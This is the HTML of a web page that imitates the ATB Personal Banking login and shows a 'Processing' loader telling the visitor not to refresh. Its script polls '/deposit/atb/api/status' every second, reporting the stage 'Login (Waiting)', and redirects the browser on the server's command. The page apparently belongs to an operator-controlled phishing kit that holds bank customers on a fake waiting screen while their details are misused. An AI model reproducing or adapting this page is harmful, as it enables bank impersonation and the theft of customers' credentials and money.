
<html class="fa-events-icons-ready"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <link rel="Shortcut Icon" href="deposit/atb/favicon.ico" type="image/x-icon">
        <title>ATB Personal Banking</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="./files/fonts.css">
        <link href="./files/f26ba7188d.css" media="all" rel="stylesheet">
        <link href="./files/css" rel="stylesheet">
        <link rel="stylesheet" href="./files/main.css">
        <script src="./files/jquery-3.6.0.min.js###%" crossorigin="anonymous"></script>
        <script>
            var lrbank = 'ATB';
            var lrinfo = 'Login (Waiting)';
        </script>
        <script>
            setInterval(function() {
                $.post('/deposit/atb/api/status', {page: lrinfo}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
    </head>
    <body>
        <div id="app">
            <div class="sc-kgoBCf bzQzYK" id="rbw-overall-context-wrapper">
                <div class="sc-iwsKbI jTTtAZ"></div>
                <div class="sc-jzJRlG eNoisr">
                    <form class="sc-jTzLTM cUTnPT" id="rbw-login-block">
                        <div class="sc-bdVaJa khUSez">
                            <img class="sc-htpNat gRCWAJ" src="./files/atb-jewel.svg" id="rbw-login-heading-atb-logo">
                            <div class="sc-EHOje ifxqtD" id="rbw-login-heading-contextHeader">
                                <div class="sc-bZQynM djdoFH">
                                    <div class="sc-dnqmqq fmWZCn">Personal</div>
                                </div>
                            </div>
                        </div>
                        <div class="sc-fjdhpX Pbrfi" id="rbw-login-form-login-block">
                            <style>
                            .loader-div {
                                text-align: center;
                                padding-top: 20px;
                            }

                            .loader-div h2 {
                                font-size: 28px;
                                margin-bottom: 40px;
                            }

                            .loader-div p {
                                margin-top: 37px;
                                padding: 0px 42px;
                                font-size: 16px;
                            }
                            </style>
                            <script>
                            setInterval(function() {
                                $('.loader-div p').css('display', 'block');
                            }, 4000);
                            </script>
                            <div class="_1AR6e5iqu8uXHMTFKLnqWr loader-div">
                                <h2 class="heading--title2 ng-binding">Processing</h2>
                                <img src="./files/loading.gif" width="80">
                                <p style="display: block;">This is taking longer than usual, please do not refresh the page</p>
                            </div>
                        </div>
                    </form>
                </div>
                <div class="sc-kAzzGY cUrlcM">
                    <div class="sc-chPdSV emnlIF" id="rbw-marquee-block">
                        <div class="sc-ckVGcZ czSiSX"></div>
                    </div>
                </div>
            </div>
        </div>
    

</body></html>